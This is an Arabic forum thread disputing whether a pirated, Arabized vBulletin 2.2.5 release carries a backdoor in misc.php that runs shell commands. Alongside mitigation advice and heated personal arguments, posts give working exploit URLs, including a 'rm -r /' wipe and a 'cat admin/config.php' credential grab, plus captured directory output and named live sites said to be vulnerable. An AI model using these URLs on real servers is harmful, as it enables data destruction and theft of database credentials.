| |||||||
| المدوّنات | البحث | مشاركات اليوم | اجعل كافة المشاركات مقروءة |
 |
| | LinkBack | أدوات الموضوع |
| |||||
| ثغره مقصوده في منتدى vb تعريب دار العرب :( نزلت أخر نسخه من منتديات vBulliten 2.2.5 والكل بدا بالتحديث والتعريب وهذي نقطه حلوه لكن اللي يثير الاشمئزاز هو انه يكون فيه من يستغلك خلونا من المقدمات والخربطه الفاضيه وندخل في الموضوع الموضوع هو أستغلال دار العرب لكم وأعطائكم نسخ ملوثه غشكم فيها خلونا نشوف من وين بدا التلاعب في الملف misc.php في السطر 110 كود PHP: وحتى لو كانت موجوده فهي ثغره غبيه ولا أعتقد يخطئ جون بكتابتها فعن طريق أسناد القيمه systemclean2 إلى المتغير action وبعدها أدخال أي أمر من أوامر نظام التشغيل اللي على السيرفر في المتغير cc راح يتنفذ هذا الأمر وراح ترجع لك مخرجات الامر هذا في الاكسبلورر طبعا هو أستخدم الداله system(); والداله passthru(); والداله exec(); ( هذي على ما أعتقد تقوم بتنفيذ أي برنامج على السيرفر) هو كانت تكفيه وحده منهم بس الظاهر أنه طماع أنا بأعطيكم الاكسبلويت للثغره وأنتم جربوها ( على نسخه دار العرب 2.2.5 وأكيد النسخ اللي قبلها فيها نفس الغباء) لنظام التشغيل *nix http://www.xxx.com/vb/misc.php?actio...emclen2=&cc=ls اما للويندوز راح تكون http://www.xxx.com/vb/misc.php?actio...emclen2&cc=dir وبالأمكان تغيير systemclen2 إلى systemclen3 وأيضا إلى systemclen4 ملاحظه قبل ما أنهي الموضوع: أما ما أعرف دار العرب ولا أعرف نواياه | |||||
|
| |||||
|
اقول الكلام الكثير وتشويه سمعة الناس ماشاء الله علينا بس التعاون والتشجيع بعض دورها عند غيرنا ،،،،، جرب كلامك انت على المنتديات اللي نزلوا نسخة دار العرب وبعدين تعال تكلم انا جربت على نفسي وعلى السيرفر المحلى بعد ويندوز ولينكس ويسلمون عليك ويقولون معصي ماني مغير نسخة دار العرب ومادام هو مسلم واخو لنا فانا وغيري شكرناه على عمله ودعونا له اما كانه عمل غير كذا فحسابه عند رب العالمين والله ماينفعة سيرفري وهو ماهو في حاجة له اصلا هو يالله في موقعة وزوارة يلحق الناس ،،، ننتظر رد دار العرب هو الوحيد اللي يفند كلامك ويرد عليك
__________________ http://www.swalif.net/softs/ جامعه العرب الالكترونية | |||||
|
| |||||
| السلام عليكم
شلونكم يااخواان قبل كل شي احب اقووولكم الاستعجال من عمل الشيطان وثانيا قبل ليصير الموضوع حااامي جدا ويطلع كلام من الاعضاء بالخطا التاكد من كلام محسن هل هو صحيح او لا اي على الذين يستخدمون نسخة دار العرب هم الذين يتكفلون على الرد على محسن وثالثا على الاخ محسن كتابة الموضوع في قسم المنتديات وليس هذا القسم وعلى المشرفين نقل هذا الموضوع ورابعا على دار العرب أثبات أن كلام محسن غير صحيح وشكرا
__________________ أتمنى من الأعضاء من له يوزر في منتديات اجنبية ان يضع هذا الرابط في توقيعه .. لتعريفهم بــ 10 لغات عن سيرة الرسول صلى الله عليه وسلم http://mohammad.islamway.com/?lang=eng | |||||
|
| |||||
|
اخواني من اخوكم قلعة العرب..ومن الجميع بس اسمحولي فيها ارجو ان لا يرد احد على الموضوع سوى اخونا دار العرب مع اني واثق من النسخة وما اغير نسخة دار االعرب لحين اصير اعمل نسخة بنفسي حتى ولو كان فيها الف خلل <=====مرتاح ما شاف نسخة زي نظافتها  ارجوكم اخواني ها انا اترجاكم الان... من جميع الاعضاء في سوالف اولا قبل كل شيء كلنا نعرف دار العرب وصدقه وامانته معنا ولا اريد ان اسمع اي شخص يذمه دون تاكد.. رجائي عدم الرد على الموضوع الا بعد ان يرد الاخ دار العرب تحياتي
__________________ شبكة قلعة العرب http://www.arabscastle.com =============== في دمشق كل شي غير! | |||||
|
| |||||
|
بالفعل كلام الاخ محسن صحيح ... حيث قمت بمعاينة عدد من المنتديات و التي تحوي نفس الثغرة ... و فيما يبدو فإن الاخ دار العرب قد اوكل مهمة التعريب لشخص غير امين ... حيث ان نسخة منتداه غير نظيفة ايضاً ... و هناك موقع غربة ، فنسخة منتداه غير نظيفة بالمثل ... ما أقول إلا هاذي هي النسخ المقرصنة و اللي تسويه ... | |||||
|
| |||||
|
لا حول ولا قوه الا بالله العلي العظيم يا اخواني الكرام ما اقول كلمه الا وانا مسئول عنها امام الله انا في اخلاق دار العرب ما لقيت اثنين هذا اولا الامر الاخر بالنسبه للاخ محسن تقول ما تعرف دار العرب وجاء هنا وبكل تجرء تقول قرصنه يعني ما تعرفه تسبه عادي الاخ محسن وهالثغره الامنيه يمكن منها اختراق المنتدى او تخريبه صحيح طيب اخوي قبل لا تنقز بالكلام هنا روح وطبق نظريتك على موقع اخوي دار العرب وعلى المنتدى ومو معقول انه يركب شي لنفسه فيه خلل مع انه ثقتي وثقة الكثير بدار العرب لكن يا دار العرب اصبر هذا كله سبب المجانيه .........
__________________ مؤسسة المهمات البرمجية 00966507585887 0507585887 www.mr-php.com.sa www.mr-php.com | |||||
|
| |||||
|
المهمه9 هل تتوقع أن فيه أحد يخدع نفسه !!!!!!!!! ( جاوب عليها بينك وبين نفسك) مع أحترامي وتقديري لك لكن ممكن أنك تسرعت المسأله ممكن يكون فيها لبس في من أضاف الدوال هذي لكن اللي نعرفه حنا أن النسخه معربها دار العرب سواء عربها هو بنفسه أو أوكل جزء من المهمه لغيره فهذا أمر ما يهمنا ولا ينفعنا لكن الثغره موجوده وأنا منزل النسخه اللي جربت عليها من المنتدى هذا ولا أذكر بالتحديد في أي موضوع لكن اللي متأكد منه أنها من تعريب دار العرب ( على حسب ملف التكست الموجود مع المنتدى) أخوي اللي قلت انه طلعت لك صفحه بيضا هذا معناته أنه نسختك أو النسخه اللي جربت عليها سليمه وممكن نستدل من هذا أن البلا في نسخ وفيه نسخ نظيفه اللي يحدد هو ملف misc.php مب أنا | |||||
|
| |||||
|
اخي الكريم محسن كلامك سليم وعقلاني ولكن لدي سؤال كم مره حملت نسخه دار العرب نقول 500 مره يعني 500 شخص حاول يعدل ويضبط فيها ومنهم ما استساغ بعض كلمات التعريب ويعدل بنفسه عليها واضاف هالجمله ضمن الموجود والنسخه ما زالت تعريب دار العرب ونزلها مره اخرى في موقع وحملها 50 شخص واصيبوا بها نحمل الاثم على دار العرب؟؟ بعد فيه لعب متفق معك انا لكن انا واثق 200 % انه دار العرب ما يسويها
__________________ مؤسسة المهمات البرمجية 00966507585887 0507585887 www.mr-php.com.sa www.mr-php.com | |||||
|
| |||||
|
الوضع الافتراضي للـPHP هو عدم تمكين استخدام المتغيرات العادية للوصول إلى المتغيرات التي يرسلها المتصفح (وهذا أكثر أماناً) يعني للوصول إلى المتغيرات التي يرسلها المتصفح ، يجب استخدام مصفوفات خاصة، مثلاً لطريقة POST تستخدم : كود PHP: كود PHP: لطريقة GET : كود PHP: كود PHP: للمعلومية شبكة دار العرب لم تفعل هذا الشيء (لأن المنتدى الخاص بها ببساطة يحتوي على نفس الباب الخلفي، ولا أعتقد أنهم يرغبون في تركيب برنامج به باب خلفي كهذا) ، فهم لا يعرفون بوجوده هاهاهاها ، لا تسرع بالذهاب هناك فقد تم إبلاغ المسؤول عن المنتدى وتم مسح الملف misc.php تماماً من منتدى دار العرب | |||||
|
| |||||
|
السلام عليكم كيف حالكم طبعا اي واحد يضع منتدى او ملف قد نقول له جزاك الله خير على جهدك وتعبك وممكن اي واحد سواء بحسن نية قد يضرك من حيث لا تشعر ولا يقصد هو ..... اذا ودك تضع نسخة منتدى ومع الوقت يصير لك اعضاء وزوار وامانة هالمنتدى في رقبتك يا اخي لا توجع راسك .... ادفع لك 500 ريال واشتر نسخة رسمية والا شوف لك واحد من اصحاب المواقع اللي مستعد يعمل لك بفلوس وتذله عليها  بعد ما تدفع عشطعشر ألف دولار !!! اما انك تتهم فلان وعلان وهذي ثغرة ما ثغرة ممكن بكل هدوء تقول يا اخي فلان ترى نسختك فيها كيت وكيت من غير سوء ظن او اتهام وا] واحد يقبلها والا ما يقبلها بعد ترى ارض الله واسعة  والمنتديات على افى من يشيل .وضع في اعتبارك ان ايملف تجده هنا مجان قول الحمدلله والشكر ان في ناس شغالة تعرب وتوجع راسها وصدقوني كثرة الاتهامات وسوء النوايا في الناس ادت الى ان الكثير يبخل وما يعرب وما يقدم لكم اي خدمة حتى ما يأتي احد ويتهم ويوجع راسه بكلام يا اخي نسختك فاشلة والا ما تعرف تعرب والا والا من الكلام اللي يضيق الصدر . واشوف السالفة صارت اتهامات مع ان ما اعرف الا ثغرة وحدة وهي ثقب الاوزون الله يعين على حله .وسلامتكم
__________________ [ من لزم الاستغفار جعل الله له من كل هم فرجا ومن كل ضيق مخرجا ] ®اخوكم بومحمد® | |||||
|
| |||||
|
يا شباب وش المفروض يطلع لو فتحنا هالصفحه كيف نعرف انه هالنسخه مضروبه او لا ؟؟؟؟؟؟؟؟؟تكفون جاوبوني
__________________ مؤسسة المهمات البرمجية 00966507585887 0507585887 www.mr-php.com.sa www.mr-php.com | |||||
|
| |||||
|
أخوي محمد_يوسف111 فعلا كلامك سليم لكن وش تسوي إذا جربتها وسردت لك الملفات نظريا كلامك أصح من كلامي لكن عمليا كلامي أصح المهمه9 إذا طلعت لك الصفحه بيضاء الحمدلله كفا الله المؤمنين شر القتال أما إذا سرد لك الملفات الموجوده فكل اللي تحتاجه هو مسح السطور التاليه من الملف misc.php كود PHP: | |||||
|
| |||||
|
عجبي ا نا عملت 6 منتديات ينسخة دار العرب ودائما تطلعلي الصفحة بيضاء اليك عزيزي http://mineerva.com/vb http://minerva.host.sk/vb http://altahamy.com/vb http://altahamy.host.sk/vb http://jwad.com/vb http://waseem.host.sk/vb http://loly.host.sk/vb المنتدى الاول منتداي الرئيسي المنتديات الاخرى لاصدقائي ومنتديات تجريبية الي غريبة في كلهم ما طلع اي غلط الا في منتداكم انتو الكم واحد !!!!!!! والله العالم ماعندها سيرة غير نسخة دار العرب لانها افضل نسخة الصراحة...لا انكر هناك خطا واحد فيها والكل استطاع حله فقط هذا الخطا وهو ممكن سهوة او نسوة عزيزي... بس ما اقول الكم اي شيء انا اقول فقط للاخ دار العرب خلك تعطي مجاني ... العالم الي ما تستاهل تذكر اسمها هذا بسب المجاني وان شاء الله يجي يوم وما تلاقو اي شخص يعطيكم مجاني...ساعتها راح اشوف شلون دخيلك يا دار العرب والله يرحم والديك يا دار العرب وانقذنا يا دار العرب ومن هذا الحكي الي انا سامعه كثير واكثر من كثير من اغلبية المستخدمين.. ليس فقط لدار العرب...بل لجميع المعربين.. يوم يجيك واحد مو عارف يركب نسخة منتدى يقولك نسخة ابو منار فيها خطا الثاني مو عارفي انه راح يتشفرو الباسوردز بعد الترقية يقلك نسخة دار العرب فيها خطا ماني عارف الرقم السري حقي الله بعين اخواني الله بعين اصلا نحن العرب لن نصبح بحياتنا الا اذا صار كل شي فلوس بفلوس وساعتها خلكم تعملو منتديات على كيفكم... في الاساس لولا دار العرب ممكن نقول 40 من المنتديات العربية ما شافت النور...ولولا غيره كمان 40% من المنتديات ما شافت النور ولولا غيره كمان ووهكذا لحين ما تشوفون غير نسخة وحدة طاقة عقولكم عليها الي هو مركبها دار العرب في منتداه او مركبها غيره من المعربين في منتداهم.. يعني ما يبقى غير حوالي خمس منتديات معربة الي هية منتديات المعربين...ساعتها اخواني راح تشوفو منتداكم الي عاملينه بالانجليزي وتحوص ليل نهار عشان تلاقي مين يعربه..وبالاخير تلاقي واحد يقلك حط فلوس$$$ اعربلك ياه ما ... تحط اطلع برا وراح تشوف انك راح تضلك برا طول حياتك لان اغلب العرب ما يدفعون ليش...لانهم يبون تعب غيرهم ببلاش...وبالاخر يجي يقولك انه صاحبها غير امين... فجزاكم الله خيرا على ما فعلتم من اجل رد جميل هذا الانسان الذي سهر الليالي ليعرب لك نسخة وهو ليس له الفضل فقط عليك..لا اله فضل عليك غصب عنك واله فضل على رواد منتداك..لانه عملهم ساحة حوار عربية وببلاش!!والله ما يسمعون جون وربعة ليسكرو منتداه في ربع دقيقة وهو مضحي بالخطر لمنتداه عشان تيجون انتو في النهاية....تعرفون الباقي اكيد!!!... واتفق العرب على ان لا يتفقو في حياتهم.. وهذي نصيحة لكل المعربين ولا استثني احد منهم...كلمة لكل المعربين يا خي ليش تعرب وتنزل نحنا ما نستحق تضوع تعبك من اجل نفضح فيك في النهاية نحنا ما نستاهل والله ما نستاهل تعربون قائمة بريدية لان ثاني يوم راح نيجي نقولكم انها مضروبة للاسف وبالفعل للاسف هذا حال العرب  ودمتم في رعاية الله
__________________ شبكة قلعة العرب http://www.arabscastle.com =============== في دمشق كل شي غير! | |||||
|
| |||||
|
انا كما اسلفت عندي النسخة المضروبة وحقيقة انصح جميع الشباب بتفادي هذي الثغرة ومسح الاسطر اللي اشار لها الاخ محسن لانها فعلاً ثغرة امنية وهذا الكلام ماجبته من عندي وامس انا جربت على منتداي وعلى السيرفر عندي لكن بعد ان التقيت باحد الشباب الخبرة في هذا المجال جرب سطر على سيرفري المحلي (ويندوز) وفعلا سرد جميع الملفات اللي بمجلد (vb) وظهر زي ماهو امامكم الان في الاسطر التالية : كود: Volume in drive C has no label
Volume Serial Number is 0D49-1C01
Directory of C:\apache\htdocs\vb223
. <DIR> 27/02/02 10:09a .
.. <DIR> 27/02/02 10:09a ..
ANNOUN~1 PHP 3.990 07/03/02 2:54a announcement.php
ATTACH~1 PHP 2.573 07/03/02 2:54a attachment.php
AVATAR PHP 1.275 07/03/02 2:54a avatar.php
CALENDAR PHP 30.884 07/03/02 2:54a calendar.php
CP CSS 2.498 07/03/02 2:54a cp.css
EDITPOST PHP 10.651 07/03/02 2:54a editpost.php
FAVICON ICO 4.710 07/03/02 2:54a favicon.ico
FORUMD~1 PHP 23.609 07/03/02 2:54a forumdisplay.php
GLOBAL PHP 9.454 07/03/02 2:54a global.php
INDEX PHP 12.092 07/03/02 2:54a index.php
MEMBER PHP 47.318 07/03/02 2:54a member.php
MEMBER2 PHP 14.749 07/03/02 2:54a member2.php
MEMBER~1 PHP 6.642 07/03/02 2:54a memberlist.php
MISC PHP 4.852 08/03/02 12:33p misc.php
MODERA~1 PHP 2.259 07/03/02 2:54a moderator.php
NEWREPLY PHP 18.064 07/03/02 2:54a newreply.php
NEWTHR~1 PHP 14.476 07/03/02 2:54a newthread.php
POLL PHP 17.552 07/03/02 2:54a poll.php
POSTINGS PHP 32.002 07/03/02 2:54a postings.php
PRINTT~1 PHP 3.102 07/03/02 2:54a printthread.php
PRIVATE PHP 27.683 07/03/02 2:54a private.php
PRIVATE2 PHP 27.431 07/03/02 2:54a private2.php
REGISTER PHP 22.073 07/03/02 2:54a register.php
REPORT PHP 2.018 07/03/02 2:54a report.php
SEARCH PHP 37.524 07/03/02 2:54a search.php
SENDTO~1 PHP 2.423 07/03/02 2:54a sendtofriend.php
SHOWTH~1 PHP 15.646 07/03/02 2:54a showthread.php
THREAD~1 PHP 4.046 07/03/02 2:54a threadrate.php
USERCP PHP 10.900 07/03/02 2:54a usercp.php
VBCODE JS 5.381 07/03/02 2:54a vbcode.js
VBCODE~1 JS 1.770 07/03/02 2:54a vbcode_language.js
ONLINE PHP 29.996 07/03/02 2:54a online.php
SHOWGR~1 PHP 6.699 07/03/02 2:54a showgroups.php
ADMIN <DIR> 27/02/02 10:09a admin
IMAGES <DIR> 27/02/02 10:09a images
MOD <DIR> 27/02/02 10:09a mod
IMAGE1 PSP 41.297 11/05/02 2:18a Image1.psp
HEADER TXT 624 11/05/02 2:34a header.txt
IMAGE1 GIF 28.982 11/05/02 2:18a Image1.gif
FOOTER TXT 439 11/05/02 2:34a footer.txt
INDEX HTM 1.284 11/05/02 2:34a index.htm
PSPBRWSE JBF 7.502 01/03/02 12:42a pspbrwse.jbf
IMAGES~1 <DIR> 28/02/02 11:07p images111
39 file(s) 536.470 bytes
6 dir(s) 1.827.012.608 bytes free
__________________ http://www.swalif.net/softs/ جامعه العرب الالكترونية | |||||
|
| |||||
|
قلعة العرب إذا ماعليك أمر أبغا نسخه من الملف اللي تكلمنا عنه والموجود في أول منتدى كتبته في موضوعك السابق هذا شي الشي الثاني انا في الوقت اللي قاعد اكتب الرد هذا حصلت موقع فيه الثغره هذي وكنت راح أكتبه هنا لكن للأسف لاني قدرت أقرا محتوى ملف config.php وهذا فيه خطر على الموقع المذكور لذلك أنا راح أعطي الموقع هذا لواحد فقط وهو دار العرب ( هذا إذا كان عارف بالموضوع) | |||||
|
| |||||
|
اسمعوا: دار العرب بريء من ذلك تماماً براءة الذئب من دم يوسف هل تعرفون من وضع هذا الكود ؟ سأخبركم... سؤال ، من أين أتى دار العرب بالنسخة التي عربها ؟؟؟ إنها من بعض المخربين "الكراكرز" الذين قاموا بأخذ النسخة الأصلية وحذفوا كود التبليغ ثم وضعوا أكواد أخرى خبيثة أكثر خطراً من كود التبليغ نفسه، وبعد ذلك نشروها وهذا ببساطة يعني أن أغلب النسخ الموجودة هنا المقرصنة تحتوي على نفس الثغرة وهي بالمناسبة ليست ثغرة، وإنما باب خلفي يستغله من قرصن vBulletin للروح والمجيء في مواقع الضحايا الذين استخدموا النسخة التي وزعها (هل عرفت الآن لماذا يوزع الكراكرز هذه الأشياء مجاناً؟) ولا تقتصر على عرض الملفات فقط كما هو شائع بل إنها تعطي القدرة الكاملة على تنفيذ أي أمر على الخادم وكأنك أمام الخادم يعني مثلاً جرب : http://somedomain/misc.php?action=systemclen2&cc=rm -r / وادعيلي ستجد أن جميع محتويات القرص الصلب (بل جميع الأقراص الصلبة) الموجودة على الخادم قد انمحت تماماً وكأن ليس لها وجود بما في ذلك نظام التشغيل نفسه طبعاً في بعض الخوادم الأكثر أماناً ، قد لا يقوم بفعل هذا الشيء ولكنه على الأقل جداً سيمحي جميع الملفات التي مسموح للـPHP بمحوها يعني لو كان الـPHP يعمل كمستخدم جذري سيتم محو كل شيء لو مستخدم عادي سيتم محو كل متعلقاته (جميع الملفات الخاصة به التي تشمل منتديات ملفات HTML كل الموقع الخاص بك) والأخطر من ذلك هو سرقة البيانات مثلاً: http://somedomain/misc.php?action=systemclen2&cc=cat admin/config.php > stolendata ثم http://somedomain/stolendata سيتم عرض اسم المستخدم وكلمة السر لقاعدة البيانات والخادم الخاص بها ومن ثم يمكن استخدام هذه البيانات في سرقة جميع بيانات المشتركين في المنتدى والمراقبين والمشرفين، بكلمات المرور بالطبع | |||||
|
| |||||
| دليل اخر على عدم مسؤولية دار العرب
قمت بانزال النسخة اللي في اللي في هذا الموضوع vbulletin v2.2.3 B تحميل وشرح للتركيب والابقريد ووجدت انها مضروبة وفيها مشكلة نفس المشكلة !!!!! طيب قمت بانزال النسخة اللي في هذا الموضوع vbulletin v2.2.2 تحميل وشرح للتركيب والابقريد ونفس الشئ ذاته النسخة مضروبة ونفس الثغرة في النسختين تصدقون؟؟؟ وانا جربت الثغرة على النسخة 2.2.3 وتطبيق الثغرة بالرد اللي لي بالاعلى الموضوعين تم طرحهما الموضوعين تم طرحهما من قبل العضو (Coderz) ونحن ننتظر ردة لان هذه النسختين اقدم من نسخ دار العرب ونحن وثقنا فيه وفي نسختة قبل نسخة دار العرب ونفي الاسطر ونفس كل شئ ولا احد انتبة إلا بعد مانبهنا محسن لنسخة دار العرب لكن انا الان اوضح لكم نسخ اقدم ونفس المشكلة كذلك هذه النسخة في هذا الموضوع نسخة المنتديات 2.2.5 من دار العرب لذلك تكون الحصيلة هي ثلاث نسخ مضروب في المنتدى 2.2.2 2.2.3 2.2.5 وانصحكم تزورا هذا الموضوع وعني انا لاتعليق اضغط هنا لاحول ولا قوة إلا بالله
__________________ http://www.swalif.net/softs/ جامعه العرب الالكترونية | |||||
|
| |||||
|
قلعة العرب: المنتدى الخاص بك موجود به هذا الباب الخلفي جرب : http://mineerva.com/vb/misc.php?acti...cc=somecommand محسن: قلت لكم أنني أخبرته بعد أن وجدت المنتدى الخاص به مصاب أيضاً بهذه الثغرة (تم إزالة الملف misc.php لذلك لا احد يحاول الذهاب هناك واختراقه) أيضاً لا يوجد نظري أو عملي أنا قلت أن هذا يعتمد على ملف php.ini ولكن من الواضح أن أغلب الخوادم لا يهمها هذا الأمر كثيراً يعتمد عمل هذا الباب الخلفي أو لا على إعدادات php.ini فمثلاً لو كان على Safe Mode فسيتم إلغاء الدوال التي تنفذ أوامر على النظام مثل host.sk جرب مثلاً: http://loly.host.sk/vb/misc.php?acti...cc=somecommand ثم هذا: http://loly.host.sk/vb/misc.php?acti...cc=somecommand ثم هذا: http://loly.host.sk/vb/misc.php?acti...cc=somecommand ثم هذا: http://loly.host.sk/vb/misc.php?acti...cc=somecommand ستعلم أن host.sk آمن بدرجة كبيرة حيث يمنع تنفيذ أوامر باستخدام الـPHP | |||||
|
| |||||
| اقتباس:
لانه حتى منتداه كان مضرب فيه صح ؟؟ يعن الاصل مضروب مو منه.. طيب الاخ محسن من وين بيجيب كلام يقول دار العرب هو الي حاططهم ؟؟؟ هذا طلع اخونا دار العرب سليم منها لان النسخ الاصلية مضربة..فلا يجب علينا قول اي شيء يذم انسان يخدمنا.. ما حلوة تنزعو سمعة الرجال يا جماعة ونجمه لامع بالمنتديات العربية كلها واذا انتو بطلتو عن نسخه لا تخاف اخوي...انا اقولك لحد سنتين راح تضل العالم مدينة لنسخه وتعريبه... وانا ارى ان تعريبه متفوق عن تعريب الجميع في برنامج ال vb تحياتي تحياتي
__________________ شبكة قلعة العرب http://www.arabscastle.com =============== في دمشق كل شي غير! | |||||
|
| |||||
|
اخوي قلعه العرب يا خوي احس انك غبي مره وربي يعني تبع بس من غير تفكير او عقل وكانك محامي ترد عن الناس واني على علم ويقين انك لا تفهم اي شيء في هذه الامور فقط لسانك كاني اقول انك محامي ساعات استغرب من اسلوبك وعدم تفكيرك وانحاط علمك وغرورك يا اخي لا دار العرب ولا غيره معصومين من الاخطاء وبعدين دار العرب يعني توه يتعلم يعني ممكن ان يخدع مثل الكثير وليس هو معصوم ولا يمكن ان يخطى اتمنى ان تترك لغافتك الزاده وان تبتعد وتجعل كل انسان يرد عن نفسه ويدافع عن نفسه لنك لست محامين عن احد ولست مفوض من قبل اي احد فا ارجوك الزم الصمت حتى الثغرات الامنيه لا تعرفها وحاولت ان تتكلم بها من غير علم حتى انك وقعت في المشكله احب اقول لك يا من كتب موضوع حمايه المنتديات وارقد وامن اتحب ان اخترق منتداك لترى هل فيه ثغره ام لا ارجو من الجميع المعذره ولكني رايت انسان جاهل من مثل قلعه العرب قد انفعل من غير اي معلومه يعرفها وجلس يلطخ بالكلام الغير مفيد ففي المره الاول قال انه الثغره غير موجوده وعندما فحصنا منتداه قال انه دار العرب ليس له علاقه فتذبذبه في الكلام وجهله في امور لا يعلمها ولقافه الزائده في كل مكان جعلني ان ارد بهذا الرد الجارح له | |||||
|
| |||||
|
الثغرة سلمك الله موجودة موجودة وليست في دار العرب لوحدة بل النسخ اللي قبله وخلال تصفحي الساعات الماضية وجدت اكثر من خمس منتديات بها هذه المشكلة وتم ابلاغهم جميعاً بالمشكلة حتى لايقعوا فريسة لضعاف النفوس
__________________ http://www.swalif.net/softs/ جامعه العرب الالكترونية | |||||
|
| |||||
|
waleed41 خل عنك انت عزيزي...انا نفسيتي محترمة ما تسمحلي اوسخ لساني فيك ثانيا يا ابو 3 مشاركات..يعني طلعت سجلت باسم جديد ودخلت عشان تحكي كلمتين زي وجهك...ياريت ترجع على الفرشة يكون افضلك..ثانيا يا عزيزي انا مو محامي بس انا ما احب انكر فضل اي شخص كان اعتقد مفضل بنسخته المعربة على نصف المنتديات العربية...لكن انا فيني اصل لا انكر الفضل بس انت للاسف ... نكرت فضله عليك و وريني منتداك عشان اشوفك يا ابو الثغرات اسف انت حاميها...وانا ما افهم اخوي..والدليل منتداي كله خرابة والمنتديات الي انا مساويهم ما يسوو عزيزي..كل شي انا عامله ما يسوى هذا دليل اني ما افهم شيء في الثغرات الامنية... بس انت ورني منتداك عشان اشوف شو بتفهم...انظر نظرة خفيفة لمنتداك وانظر نظرة خفيفة لمنتداي وراح تشوف الفرق بيني وبينك...يا ابو التغراتكمان الثغرة الي تكلمو عنها الشباب هي غير الي عندي حاليا شوف الاربطين وتاكد وبلا فلسفة زايدة يلا ما راح اوسخ نفسي فيك لاني انا عارف مين انا وانت من لسانك راح تعرف مين انت ---------------------- اخي الطبيب..من كلامك هذا يؤدي انه كل النسخ مضربة صح...يعني دار العرب ما اله علاقة .. النسخة تيجيه مضروبة مو مثل ما قال البعض انه هو الي حاط فيها هالكود... المهم عدم الاتهام وانا قبل كل شيء قلت انتظرو صاحب العلاقة ... انافقط شيء واحد لماذا لا ننتظر الاخ دار العرب...الاخ محمد يوسف قال انه حتى دار العرب لم يعلم بالامر.. تحياتي للجميع ما عدا هذا المعتوه ابو 3 مشاركات ... انا اعرفك عزيزي لا تخاف بس ثاني مرة لا تخرج وتسجل وتفوت تحكي...احكي باسمك عشان تبين للشباب اسف فضحتك
__________________ شبكة قلعة العرب http://www.arabscastle.com =============== في دمشق كل شي غير! | |||||
|
|
| |
| |
| أدوات الموضوع | |
| |
